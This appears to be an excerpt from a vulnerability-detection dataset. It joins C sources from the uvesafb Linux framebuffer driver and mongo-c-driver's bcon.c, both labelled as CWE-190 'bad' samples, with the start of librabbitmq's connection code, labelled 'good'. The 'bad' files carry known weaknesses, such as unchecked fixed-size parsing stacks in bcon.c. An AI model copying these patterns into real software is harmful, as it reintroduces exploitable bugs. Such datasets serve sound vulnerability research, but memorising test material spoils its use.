uvesafb_ioremap(info);
if (!info->screen_base) {
pr_err("abort, cannot ioremap 0x%x bytes of video memory at 0x%lx\n",
info->fix.smem_len, info->fix.smem_start);
err = -EIO;
goto out_mem;
}
platform_set_drvdata(dev, info);
if (register_framebuffer(info) < 0) {
pr_err("failed to register framebuffer device\n");
err = -EINVAL;
goto out_unmap;
}
pr_info("framebuffer at 0x%lx, mapped to 0x%p, using %dk, total %dk\n",
info->fix.smem_start, info->screen_base,
info->fix.smem_len / 1024, par->vbe_ib.total_memory * 64);
fb_info(info, "%s frame buffer device\n", info->fix.id);
err = sysfs_create_group(&dev->dev.kobj, &uvesafb_dev_attgrp);
if (err != 0)
fb_warn(info, "failed to register attributes\n");
return 0;
out_unmap:
iounmap(info->screen_base);
out_mem:
release_mem_region(info->fix.smem_start, info->fix.smem_len);
out_reg:
release_region(0x3c0, 32);
out_mode:
if (!list_empty(&info->modelist))
fb_destroy_modelist(&info->modelist);
fb_destroy_modedb(info->monspecs.modedb);
fb_dealloc_cmap(&info->cmap);
out:
kfree(par->vbe_modes);
framebuffer_release(info);
return err;
}
static int uvesafb_remove(struct platform_device *dev)
{
struct fb_info *info = platform_get_drvdata(dev);
if (info) {
struct uvesafb_par *par = info->par;
sysfs_remove_group(&dev->dev.kobj, &uvesafb_dev_attgrp);
unregister_framebuffer(info);
release_region(0x3c0, 32);
iounmap(info->screen_base);
arch_phys_wc_del(par->mtrr_handle);
release_mem_region(info->fix.smem_start, info->fix.smem_len);
fb_destroy_modedb(info->monspecs.modedb);
fb_dealloc_cmap(&info->cmap);
kfree(par->vbe_modes);
kfree(par->vbe_state_orig);
kfree(par->vbe_state_saved);
framebuffer_release(info);
}
return 0;
}
static struct platform_driver uvesafb_driver = {
.probe = uvesafb_probe,
.remove = uvesafb_remove,
.driver = {
.name = "uvesafb",
},
};
static struct platform_device *uvesafb_device;
#ifndef MODULE
static int uvesafb_setup(char *options)
{
char *this_opt;
if (!options || !*options)
return 0;
while ((this_opt = strsep(&options, ",")) != NULL) {
if (!*this_opt) continue;
if (!strcmp(this_opt, "redraw"))
ypan = 0;
else if (!strcmp(this_opt, "ypan"))
ypan = 1;
else if (!strcmp(this_opt, "ywrap"))
ypan = 2;
else if (!strcmp(this_opt, "vgapal"))
pmi_setpal = 0;
else if (!strcmp(this_opt, "pmipal"))
pmi_setpal = 1;
else if (!strncmp(this_opt, "mtrr:", 5))
mtrr = simple_strtoul(this_opt+5, NULL, 0);
else if (!strcmp(this_opt, "nomtrr"))
mtrr = 0;
else if (!strcmp(this_opt, "nocrtc"))
nocrtc = 1;
else if (!strcmp(this_opt, "noedid"))
noedid = 1;
else if (!strcmp(this_opt, "noblank"))
blank = 0;
else if (!strncmp(this_opt, "vtotal:", 7))
vram_total = simple_strtoul(this_opt + 7, NULL, 0);
else if (!strncmp(this_opt, "vremap:", 7))
vram_remap = simple_strtoul(this_opt + 7, NULL, 0);
else if (!strncmp(this_opt, "maxhf:", 6))
maxhf = simple_strtoul(this_opt + 6, NULL, 0);
else if (!strncmp(this_opt, "maxvf:", 6))
maxvf = simple_strtoul(this_opt + 6, NULL, 0);
else if (!strncmp(this_opt, "maxclk:", 7))
maxclk = simple_strtoul(this_opt + 7, NULL, 0);
else if (!strncmp(this_opt, "vbemode:", 8))
vbemode = simple_strtoul(this_opt + 8, NULL, 0);
else if (this_opt[0] >= '0' && this_opt[0] <= '9') {
mode_option = this_opt;
} else {
pr_warn("unrecognized option %s\n", this_opt);
}
}
if (mtrr != 3 && mtrr != 0)
pr_warn("uvesafb: mtrr should be set to 0 or 3; %d is unsupported", mtrr);
return 0;
}
#endif /* !MODULE */
static ssize_t v86d_show(struct device_driver *dev, char *buf)
{
return snprintf(buf, PAGE_SIZE, "%s\n", v86d_path);
}
static ssize_t v86d_store(struct device_driver *dev, const char *buf,
size_t count)
{
strncpy(v86d_path, buf, PATH_MAX);
return count;
}
static DRIVER_ATTR_RW(v86d);
static int uvesafb_init(void)
{
int err;
#ifndef MODULE
char *option = NULL;
if (fb_get_options("uvesafb", &option))
return -ENODEV;
uvesafb_setup(option);
#endif
err = cn_add_callback(&uvesafb_cn_id, "uvesafb", uvesafb_cn_callback);
if (err)
return err;
err = platform_driver_register(&uvesafb_driver);
if (!err) {
uvesafb_device = platform_device_alloc("uvesafb", 0);
if (uvesafb_device)
err = platform_device_add(uvesafb_device);
else
err = -ENOMEM;
if (err) {
platform_device_put(uvesafb_device);
platform_driver_unregister(&uvesafb_driver);
cn_del_callback(&uvesafb_cn_id);
return err;
}
err = driver_create_file(&uvesafb_driver.driver,
&driver_attr_v86d);
if (err) {
pr_warn("failed to register attributes\n");
err = 0;
}
}
return err;
}
module_init(uvesafb_init);
static void uvesafb_exit(void)
{
struct uvesafb_ktask *task;
if (v86d_started) {
task = uvesafb_prep();
if (task) {
task->t.flags = TF_EXIT;
uvesafb_exec(task);
uvesafb_free(task);
}
}
cn_del_callback(&uvesafb_cn_id);
driver_remove_file(&uvesafb_driver.driver, &driver_attr_v86d);
platform_device_unregister(uvesafb_device);
platform_driver_unregister(&uvesafb_driver);
}
module_exit(uvesafb_exit);
static int param_set_scroll(const char *val, const struct kernel_param *kp)
{
ypan = 0;
if (!strcmp(val, "redraw"))
ypan = 0;
else if (!strcmp(val, "ypan"))
ypan = 1;
else if (!strcmp(val, "ywrap"))
ypan = 2;
else
return -EINVAL;
return 0;
}
static const struct kernel_param_ops param_ops_scroll = {
.set = param_set_scroll,
};
#define param_check_scroll(name, p) __param_check(name, p, void)
module_param_named(scroll, ypan, scroll, 0);
MODULE_PARM_DESC(scroll,
"Scrolling mode, set to 'redraw', 'ypan', or 'ywrap'");
module_param_named(vgapal, pmi_setpal, invbool, 0);
MODULE_PARM_DESC(vgapal, "Set palette using VGA registers");
module_param_named(pmipal, pmi_setpal, bool, 0);
MODULE_PARM_DESC(pmipal, "Set palette using PMI calls");
module_param(mtrr, uint, 0);
MODULE_PARM_DESC(mtrr,
"Memory Type Range Registers setting. Use 0 to disable.");
module_param(blank, bool, 0);
MODULE_PARM_DESC(blank, "Enable hardware blanking");
module_param(nocrtc, bool, 0);
MODULE_PARM_DESC(nocrtc, "Ignore CRTC timings when setting modes");
module_param(noedid, bool, 0);
MODULE_PARM_DESC(noedid,
"Ignore EDID-provided monitor limits when setting modes");
module_param(vram_remap, uint, 0);
MODULE_PARM_DESC(vram_remap, "Set amount of video memory to be used [MiB]");
module_param(vram_total, uint, 0);
MODULE_PARM_DESC(vram_total, "Set total amount of video memoery [MiB]");
module_param(maxclk, ushort, 0);
MODULE_PARM_DESC(maxclk, "Maximum pixelclock [MHz], overrides EDID data");
module_param(maxhf, ushort, 0);
MODULE_PARM_DESC(maxhf,
"Maximum horizontal frequency [kHz], overrides EDID data");
module_param(maxvf, ushort, 0);
MODULE_PARM_DESC(maxvf,
"Maximum vertical frequency [Hz], overrides EDID data");
module_param(mode_option, charp, 0);
MODULE_PARM_DESC(mode_option,
"Specify initial video mode as \"<xres>x<yres>[-<bpp>][@<refresh>]\"");
module_param(vbemode, ushort, 0);
MODULE_PARM_DESC(vbemode,
"VBE mode number to set, overrides the 'mode' option");
module_param_string(v86d, v86d_path, PATH_MAX, 0660);
MODULE_PARM_DESC(v86d, "Path to the v86d userspace helper.");
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Michal Januszewski <spock@gentoo.org>");
MODULE_DESCRIPTION("Framebuffer driver for VBE2.0+ compliant graphics boards");
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_222_0 |
crossvul-cpp_data_bad_3983_0 | /* bcon.c */
/* Copyright 2009-2012 10gen Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <assert.h>
#include "bcon.h"
#ifndef NOT_REACHED
#define NOT_REACHED 0
#endif
#define ARRAY_INDEX_BUFFER_SIZE 9
char *bcon_errstr[] = {
"OK",
"ERROR",
"bcon document or nesting incomplete",
"bson finish error"
};
static int bcon_error(bson *b, const bcon *bc, size_t i, bcon_error_t err) {
b->err = err;
b->errstr = bcon_errstr[err];
return BCON_ERROR;
}
bcon_error_t bson_append_bcon_array(bson *b, const bcon *bc);
static bcon_token_t bcon_token(char *s) {
if (s == 0) return Token_EOD;
switch (s[0]) {
case ':': if (s[1] != '\0' && s[2] != '\0' && s[3] != '\0' && s[4] == '\0' &&
s[3] == ':' && (s[1] == '_' || s[1] == 'P' || s[1] == 'R'))
return Token_Typespec; break;
case '{': if (s[1] == '\0') return Token_OpenBrace; break;
case '}': if (s[1] == '\0') return Token_CloseBrace; break;
case '[': if (s[1] == '\0') return Token_OpenBracket; break;
case ']': if (s[1] == '\0') return Token_CloseBracket; break;
case '.': if (s[1] == '\0') return Token_End; break;
}
return Token_Default;
}
static bcon_error_t bson_bcon_key_value(bson *b, const char *key, const char *typespec, const bcon bci) {
bcon_error_t ret = BCON_OK;
bson_oid_t oid;
char ptype = typespec ? typespec[1] : '_';
char utype = typespec ? typespec[2] : '_';
switch (ptype) {
case '_': /* kv(b, key, utype, bci) */
switch (utype) {
case '_': /* fall through */
case 's': bson_append_string( b, key, bci.s ); break; /* common case */
case 'f': bson_append_double( b, key, bci.f ); break;
case 'D':
bson_append_start_object( b, key );
ret = bson_append_bcon( b, bci.D );
bson_append_finish_object( b );
break;
case 'A':
bson_append_start_array( b, key );
ret = bson_append_bcon_array( b, bci.A );
bson_append_finish_array( b );
break;
case 'o': if (*bci.o == '\0') bson_oid_gen( &oid ); else bson_oid_from_string( &oid, bci.o ); bson_append_oid( b, key, &oid ); break;
case 'b': bson_append_bool( b, key, bci.b ); break;
case 't': bson_append_time_t( b, key, bci.t ); break;
case 'v': bson_append_null( b, key ); break; /* void */
case 'x': bson_append_symbol( b, key, bci.x ); break;
case 'i': bson_append_int( b, key, bci.i ); break;
case 'l': bson_append_long( b, key, bci.l ); break;
default: printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED); break;
}
break;
case 'R': /* krv(b, key, utype, bci) */
switch (utype) {
case 'f': bson_append_double( b, key, *bci.Rf ); break;
case 's': bson_append_string( b, key, bci.Rs ); break;
case 'D':
bson_append_start_object( b, key );
ret = bson_append_bcon( b, bci.RD );
bson_append_finish_object( b );
break;
case 'A':
bson_append_start_array( b, key );
ret = bson_append_bcon_array( b, bci.RA );
bson_append_finish_array( b );
break;
case 'o': if (*bci.o == '\0') bson_oid_gen( &oid ); else bson_oid_from_string( &oid, bci.o ); bson_append_oid( b, key, &oid ); break;
case 'b': bson_append_bool( b, key, *bci.Rb ); break;
case 't': bson_append_time_t( b, key, *bci.Rt ); break;
case 'x': bson_append_symbol( b, key, bci.Rx ); break;
case 'i': bson_append_int( b, key, *bci.Ri ); break;
case 'l': bson_append_long( b, key, *bci.Rl ); break;
default: printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED); break;
}
break;
case 'P': /* kpv(b, key, utype, bci) */
if (*bci.Pv != 0) {
switch (utype) {
case 'f': bson_append_double( b, key, **bci.Pf ); break;
case 's': bson_append_string( b, key, *bci.Ps ); break;
case 'D':
bson_append_start_object( b, key );
ret = bson_append_bcon( b, *bci.PD );
bson_append_finish_object( b );
break;
case 'A':
bson_append_start_array( b, key );
ret = bson_append_bcon_array( b, *bci.PA );
bson_append_finish_array( b );
break;
case 'o': if (**bci.Po == '\0') bson_oid_gen( &oid );
else bson_oid_from_string( &oid, *bci.Po );
bson_append_oid( b, key, &oid );
break;
case 'b': bson_append_bool( b, key, **bci.Pb ); break;
case 't': bson_append_time_t( b, key, **bci.Pt ); break;
case 'x': if (*bci.Px != 0) bson_append_symbol( b, key, *bci.Px ); break;
case 'i': bson_append_int( b, key, **bci.Pi ); break;
case 'l': bson_append_long( b, key, **bci.Pl ); break;
default: printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED); break;
}
}
break;
default:
printf("\nptype:'%c' utype:'%c'\n", ptype, utype); assert(NOT_REACHED);
break;
}
return ret;
}
typedef enum bcon_state_t {
State_Element, State_DocSpecValue, State_DocValue,
State_ArraySpecValue, State_ArrayValue
} bcon_state_t;
#define DOC_STACK_SIZE 1024
#define ARRAY_INDEX_STACK_SIZE 1024
#define DOC_PUSH_STATE(return_state) ( doc_stack[doc_stack_pointer++] = (return_state) )
#define DOC_POP_STATE ( state = doc_stack[--doc_stack_pointer] )
#define ARRAY_PUSH_RESET_INDEX_STATE(return_state) ( array_index_stack[array_index_stack_pointer++] = array_index, array_index = 0, DOC_PUSH_STATE(return_state) )
#define ARRAY_POP_INDEX_STATE ( array_index = array_index_stack[--array_index_stack_pointer], DOC_POP_STATE )
#define ARRAY_KEY_STRING(l) (bson_numstr(array_index_buffer, (int)(l)), array_index_buffer)
/*
* simplified FSM to parse BCON structure, uses stacks for sub-documents and sub-arrays
*/
static bcon_error_t bson_append_bcon_with_state(bson *b, const bcon *bc, bcon_state_t start_state) {
bcon_error_t ret = BCON_OK;
bcon_state_t state = start_state;
char *key = 0;
char *typespec = 0;
unsigned char doc_stack[DOC_STACK_SIZE];
size_t doc_stack_pointer = 0;
size_t array_index = 0;
unsigned int array_index_stack[ARRAY_INDEX_STACK_SIZE];
size_t array_index_stack_pointer = 0;
char array_index_buffer[ARRAY_INDEX_BUFFER_SIZE]; /* max BSON size */
int end_of_data;
const bcon *bcp;
for (end_of_data = 0, bcp = bc; ret == BCON_OK && !end_of_data; bcp++) {
bcon bci = *bcp;
char *s = bci.s;
switch (state) {
case State_Element:
switch (bcon_token(s)) {
case Token_CloseBrace:
bson_append_finish_object( b );
DOC_POP_STATE; /* state = ...; */
break;
case Token_End:
end_of_data = 1;
break;
default:
key = s;
state = State_DocSpecValue;
break;
}
break;
case State_DocSpecValue:
switch (bcon_token(s)) {
case Token_Typespec:
typespec = s;
state = State_DocValue;
break;
case Token_OpenBrace:
bson_append_start_object( b, key );
DOC_PUSH_STATE(State_Element);
state = State_Element;
break;
case Token_OpenBracket:
bson_append_start_array( b, key );
ARRAY_PUSH_RESET_INDEX_STATE(State_Element);
state = State_ArraySpecValue;
break;
case Token_End:
end_of_data = 1;
break;
default:
ret = bson_bcon_key_value(b, key, typespec, bci);
state = State_Element;
break;
}
break;
case State_DocValue:
ret = bson_bcon_key_value(b, key, typespec, bci);
state = State_Element;
typespec = 0;
break;
case State_ArraySpecValue:
switch (bcon_token(s)) {
case Token_Typespec:
typespec = s;
state = State_ArrayValue;
break;
case Token_OpenBrace:
key = ARRAY_KEY_STRING(array_index++);
bson_append_start_object( b, key );
DOC_PUSH_STATE(State_ArraySpecValue);
state = State_Element;
break;
case Token_OpenBracket:
key = ARRAY_KEY_STRING(array_index++);
bson_append_start_array( b, key );
ARRAY_PUSH_RESET_INDEX_STATE(State_ArraySpecValue);
/* state = State_ArraySpecValue; */
break;
case Token_CloseBracket:
bson_append_finish_array( b );
ARRAY_POP_INDEX_STATE; /* state = ...; */
break;
case Token_End:
end_of_data = 1;
break;
default:
key = ARRAY_KEY_STRING(array_index++);
ret = bson_bcon_key_value(b, key, typespec, bci);
/* state = State_ArraySpecValue; */
break;
}
break;
case State_ArrayValue:
key = ARRAY_KEY_STRING(array_index++);
ret = bson_bcon_key_value(b, key, typespec, bci);
state = State_ArraySpecValue;
typespec = 0;
break;
default: assert(NOT_REACHED); break;
}
}
return state == start_state ? BCON_OK : BCON_DOCUMENT_INCOMPLETE;
}
bcon_error_t bson_append_bcon(bson *b, const bcon *bc) {
return bson_append_bcon_with_state(b, bc, State_Element);
}
bcon_error_t bson_append_bcon_array(bson *b, const bcon *bc) {
return bson_append_bcon_with_state(b, bc, State_ArraySpecValue);
}
/**
* Generate BSON from BCON
* @param b a BSON object
* @param bc a BCON object
* match with bson_destroy
*/
bcon_error_t bson_from_bcon(bson *b, const bcon *bc) {
bcon_error_t ret = BSON_OK;
bson_init( b );
ret = bson_append_bcon_with_state( b, bc, State_Element );
if (ret != BCON_OK) return ret;
ret = bson_finish( b );
return ( ret == BSON_OK ? BCON_OK : BCON_BSON_ERROR );
}
void bcon_print(const bcon *bc) { /* prints internal representation, not JSON */
char *typespec = 0;
char *delim = "";
int end_of_data;
bcon *bcp;
putchar('{');
for (end_of_data = 0, bcp = (bcon*)bc; !end_of_data; bcp++) {
bcon bci = *bcp;
char *typespec_next = 0;
if (typespec) {
switch (typespec[1]) {
case '_':
switch (typespec[2]) {
case 'f': printf("%s%f", delim, bci.f); break;
case 's': printf("%s\"%s\"", delim, bci.s); break;
case 'D': printf("%sPD(0x%lx,..)", delim, (unsigned long)bci.D); break;
case 'A': printf("%sPA(0x%lx,....)", delim, (unsigned long)bci.A); break;
case 'o': printf("%s\"%s\"", delim, bci.o); break;
case 'b': printf("%s%d", delim, bci.b); break;
case 't': printf("%s%ld", delim, (long)bci.t); break;
case 'v': printf("%s\"%s\"", delim, bci.v); break;
case 'x': printf("%s\"%s\"", delim, bci.x); break;
case 'i': printf("%s%d", delim, bci.i); break;
case 'l': printf("%s%ld", delim, bci.l); break;
default: printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED); break;
}
break;
case 'R':
switch (typespec[2]) {
case 'f': printf("%sRf(0x%lx,%f)", delim, (unsigned long)bci.Rf, *bci.Rf); break;
case 's': printf("%sRs(0x%lx,\"%s\")", delim, (unsigned long)bci.Rs, bci.Rs); break;
case 'D': printf("%sRD(0x%lx,..)", delim, (unsigned long)bci.RD); break;
case 'A': printf("%sRA(0x%lx,....)", delim, (unsigned long)bci.RA); break;
case 'o': printf("%sRo(0x%lx,\"%s\")", delim, (unsigned long)bci.Ro, bci.Ro); break;
case 'b': printf("%sRb(0x%lx,%d)", delim, (unsigned long)bci.Rb, *bci.Rb); break;
case 't': printf("%sRt(0x%lx,%ld)", delim, (unsigned long)bci.Rt, (long)*bci.Rt); break;
case 'x': printf("%sRx(0x%lx,\"%s\")", delim, (unsigned long)bci.Rx, bci.Rx); break;
case 'i': printf("%sRi(0x%lx,%d)", delim, (unsigned long)bci.Ri, *bci.Ri); break;
case 'l': printf("%sRl(0x%lx,%ld)", delim, (unsigned long)bci.Rl, *bci.Rl); break;
default: printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED); break;
}
break;
case 'P':
switch (typespec[2]) {
case 'f': printf("%sPf(0x%lx,0x%lx,%f)", delim, (unsigned long)bci.Pf, (unsigned long)(bci.Pf ? *bci.Pf : 0), bci.Pf && *bci.Pf ? **bci.Pf : 0.0); break;
case 's': printf("%sPs(0x%lx,0x%lx,\"%s\")", delim, (unsigned long)bci.Ps, (unsigned long)(bci.Ps ? *bci.Ps : 0), bci.Ps && *bci.Ps ? *bci.Ps : ""); break;
case 'D': printf("%sPD(0x%lx,0x%lx,..)", delim, (unsigned long)bci.PD, (unsigned long)(bci.PD ? *bci.PD : 0)); break;
case 'A': printf("%sPA(0x%lx,0x%lx,....)", delim, (unsigned long)bci.PA, (unsigned long)(bci.PA ? *bci.PA : 0)); break;
case 'o': printf("%sPo(0x%lx,0x%lx,\"%s\")", delim, (unsigned long)bci.Po, (unsigned long)(bci.Po ? *bci.Po : 0), bci.Po && *bci.Po ? *bci.Po : ""); break;
case 'b': printf("%sPb(0x%lx,0x%lx,%d)", delim, (unsigned long)bci.Pb, (unsigned long)(bci.Pb ? *bci.Pb : 0), bci.Pb && *bci.Pb ? **bci.Pb : 0); break;
case 't': printf("%sPt(0x%lx,0x%lx,%ld)", delim, (unsigned long)bci.Pt, (unsigned long)(bci.Pt ? *bci.Pt : 0), bci.Pt && *bci.Pt ? (long)**bci.Pt : 0); break;
case 'x': printf("%sPx(0x%lx,0x%lx,\"%s\")", delim, (unsigned long)bci.Px, (unsigned long)(bci.Px ? *bci.Px : 0), bci.Px && *bci.Px ? *bci.Px : ""); break;
case 'i': printf("%sPi(0x%lx,0x%lx,%d)", delim, (unsigned long)bci.Pi, (unsigned long)(bci.Pi ? *bci.Pi : 0), bci.Pi && *bci.Pi ? **bci.Pi : 0); break;
case 'l': printf("%sPl(0x%lx,0x%lx,%ld)", delim, (unsigned long)bci.Pl, (unsigned long)(bci.Pl ? *bci.Pl : 0), bci.Pl && *bci.Pl ? **bci.Pl : 0); break;
default: printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED); break;
}
break;
default:
printf("\ntypespec:\"%s\"\n", typespec); assert(NOT_REACHED);
break;
}
}
else {
char *s = bci.s;
switch (s[0]) {
case '.':
end_of_data = (s[1] == '\0');
break;
case ':':
typespec_next = bcon_token(s) == Token_Typespec ? s : 0;
break;
}
printf("%s\"%s\"", delim, s);
}
typespec = typespec_next;
delim = ",";
}
putchar('}');
}
/* TODO - incomplete */
static void bcon_json_print(bcon *bc, int n) {
int t = 0;
int key_value_count = 0;
char *s;
int end_of_data;
bcon *bcp;
putchar('{');
for (end_of_data = 0, bcp = bc; !end_of_data; bcp++) {
bcon bci = *bcp;
switch (t) {
case 'l':
if (key_value_count & 0x1) putchar(':');
printf("%ld", bci.l);
t = 0;
key_value_count++;
break;
case 's': /* fall through */
default:
s = bci.s;
switch (*s) {
case ':':
++s;
t = *++s;
break;
case '{':
if (key_value_count & 0x1) putchar(':');
putchar(*s);
key_value_count = 0;
break;
case '}':
putchar(*s);
key_value_count = 2;
break;
default:
if (key_value_count & 0x1) putchar(':');
else if (key_value_count > 1) putchar(',');
printf("\"%s\"", s);
t = 0;
key_value_count++;
break;
}
break;
}
}
putchar('}');
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3983_0 |
crossvul-cpp_data_good_1203_0 | /*
* ***** BEGIN LICENSE BLOCK *****
* Version: MIT
*
* Portions created by Alan Antonuk are Copyright (c) 2012-2014
* Alan Antonuk. All Rights Reserved.
*
* Portions created by VMware are Copyright (c) 2007-2012 VMware, Inc.
* All Rights Reserved.
*
* Portions created by Tony Garnock-Jones are Copyright (c) 2009-2010
* VMware, Inc. and Tony Garnock-Jones. All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
* ***** END LICENSE BLOCK *****
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#ifdef _MSC_VER
#define _CRT_SECURE_NO_WARNINGS
#endif
#include "amqp_private.h"
#include "amqp_tcp_socket.h"
#include "amqp_time.h"
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifndef AMQP_INITIAL_FRAME_POOL_PAGE_SIZE
#define AMQP_INITIAL_FRAME_POOL_PAGE_SIZE 65536
#endif
#ifndef AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE
#define AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE 131072
#endif
#ifndef AMQP_DEFAULT_LOGIN_TIMEOUT_SEC
#define AMQP_DEFAULT_LOGIN_TIMEOUT_SEC 12
#endif
#define ENFORCE_STATE(statevec, statenum) \
{ \
amqp_connection_state_t _check_state = (statevec); \
amqp_connection_state_enum _wanted_state = (statenum); \
if (_check_state->state != _wanted_state) \
amqp_abort( \
"Programming error: invalid AMQP connection state: expected %d, " \
"got %d", \
_wanted_state, _check_state->state); \
}
amqp_connection_state_t amqp_new_connection(void) {
int res;
amqp_connection_state_t state = (amqp_connection_state_t)calloc(
1, sizeof(struct amqp_connection_state_t_));
if (state == NULL) {
return NULL;
}
res = amqp_tune_connection(state, 0, AMQP_INITIAL_FRAME_POOL_PAGE_SIZE, 0);
if (0 != res) {
goto out_nomem;
}
state->inbound_buffer.bytes = state->header_buffer;
state->inbound_buffer.len = sizeof(state->header_buffer);
state->state = CONNECTION_STATE_INITIAL;
/* the server protocol version response is 8 bytes, which conveniently
is also the minimum frame size */
state->target_size = 8;
state->sock_inbound_buffer.len = AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE;
state->sock_inbound_buffer.bytes =
malloc(AMQP_INITIAL_INBOUND_SOCK_BUFFER_SIZE);
if (state->sock_inbound_buffer.bytes == NULL) {
goto out_nomem;
}
init_amqp_pool(&state->properties_pool, 512);
/* Use address of the internal_handshake_timeout object by default. */
state->internal_handshake_timeout.tv_sec = AMQP_DEFAULT_LOGIN_TIMEOUT_SEC;
state->internal_handshake_timeout.tv_usec = 0;
state->handshake_timeout = &state->internal_handshake_timeout;
return state;
out_nomem:
free(state->sock_inbound_buffer.bytes);
free(state);
return NULL;
}
int amqp_get_sockfd(amqp_connection_state_t state) {
return state->socket ? amqp_socket_get_sockfd(state->socket) : -1;
}
void amqp_set_sockfd(amqp_connection_state_t state, int sockfd) {
amqp_socket_t *socket = amqp_tcp_socket_new(state);
if (!socket) {
amqp_abort("%s", strerror(errno));
}
amqp_tcp_socket_set_sockfd(socket, sockfd);
}
void amqp_set_socket(amqp_connection_state_t state, amqp_socket_t *socket) {
amqp_socket_delete(state->socket);
state->socket = socket;
}
amqp_socket_t *amqp_get_socket(amqp_connection_state_t state) {
return state->socket;
}
int amqp_tune_connection(amqp_connection_state_t state, int channel_max,
int frame_max, int heartbeat) {
void *newbuf;
int res;
ENFORCE_STATE(state, CONNECTION_STATE_IDLE);
state->channel_max = channel_max;
state->frame_max = frame_max;
state->heartbeat = heartbeat;
if (0 > state->heartbeat) {
state->heartbeat = 0;
}
res = amqp_time_s_from_now(&state->next_send_heartbeat,
amqp_heartbeat_send(state));
if (AMQP_STATUS_OK != res) {
return res;
}
res = amqp_time_s_from_now(&state->next_recv_heartbeat,
amqp_heartbeat_recv(state));
if (AMQP_STATUS_OK != res) {
return res;
}
state->outbound_buffer.len = frame_max;
newbuf = realloc(state->outbound_buffer.bytes, frame_max);
if (newbuf == NULL) {
return AMQP_STATUS_NO_MEMORY;
}
state->outbound_buffer.bytes = newbuf;
return AMQP_STATUS_OK;
}
int amqp_get_channel_max(amqp_connection_state_t state) {
return state->channel_max;
}
int amqp_get_frame_max(amqp_connection_state_t state) {
return state->frame_max;
}
int amqp_get_heartbeat(amqp_connection_state_t state) {
return state->heartbeat;
}
int amqp_destroy_connection(amqp_connection_state_t state) {
int status = AMQP_STATUS_OK;
if (state) {
int i;
for (i = 0; i < POOL_TABLE_SIZE; ++i) {
amqp_pool_table_entry_t *entry = state->pool_table[i];
while (NULL != entry) {
amqp_pool_table_entry_t *todelete = entry;
empty_amqp_pool(&entry->pool);
entry = entry->next;
free(todelete);
}
}
free(state->outbound_buffer.bytes);
free(state->sock_inbound_buffer.bytes);
amqp_socket_delete(state->socket);
empty_amqp_pool(&state->properties_pool);
free(state);
}
return status;
}
static void return_to_idle(amqp_connection_state_t state) {
state->inbound_buffer.len = sizeof(state->header_buffer);
state->inbound_buffer.bytes = state->header_buffer;
state->inbound_offset = 0;
state->target_size = HEADER_SIZE;
state->state = CONNECTION_STATE_IDLE;
}
static size_t consume_data(amqp_connection_state_t state,
amqp_bytes_t *received_data) {
/* how much data is available and will fit? */
size_t bytes_consumed = state->target_size - state->inbound_offset;
if (received_data->len < bytes_consumed) {
bytes_consumed = received_data->len;
}
memcpy(amqp_offset(state->inbound_buffer.bytes, state->inbound_offset),
received_data->bytes, bytes_consumed);
state->inbound_offset += bytes_consumed;
received_data->bytes = amqp_offset(received_data->bytes, bytes_consumed);
received_data->len -= bytes_consumed;
return bytes_consumed;
}
int amqp_handle_input(amqp_connection_state_t state, amqp_bytes_t received_data,
amqp_frame_t *decoded_frame) {
size_t bytes_consumed;
void *raw_frame;
/* Returning frame_type of zero indicates either insufficient input,
or a complete, ignored frame was read. */
decoded_frame->frame_type = 0;
if (received_data.len == 0) {
return AMQP_STATUS_OK;
}
if (state->state == CONNECTION_STATE_IDLE) {
state->state = CONNECTION_STATE_HEADER;
}
bytes_consumed = consume_data(state, &received_data);
/* do we have target_size data yet? if not, return with the
expectation that more will arrive */
if (state->inbound_offset < state->target_size) {
return (int)bytes_consumed;
}
raw_frame = state->inbound_buffer.bytes;
switch (state->state) {
case CONNECTION_STATE_INITIAL:
/* check for a protocol header from the server */
if (memcmp(raw_frame, "AMQP", 4) == 0) {
decoded_frame->frame_type = AMQP_PSEUDOFRAME_PROTOCOL_HEADER;
decoded_frame->channel = 0;
decoded_frame->payload.protocol_header.transport_high =
amqp_d8(amqp_offset(raw_frame, 4));
decoded_frame->payload.protocol_header.transport_low =
amqp_d8(amqp_offset(raw_frame, 5));
decoded_frame->payload.protocol_header.protocol_version_major =
amqp_d8(amqp_offset(raw_frame, 6));
decoded_frame->payload.protocol_header.protocol_version_minor =
amqp_d8(amqp_offset(raw_frame, 7));
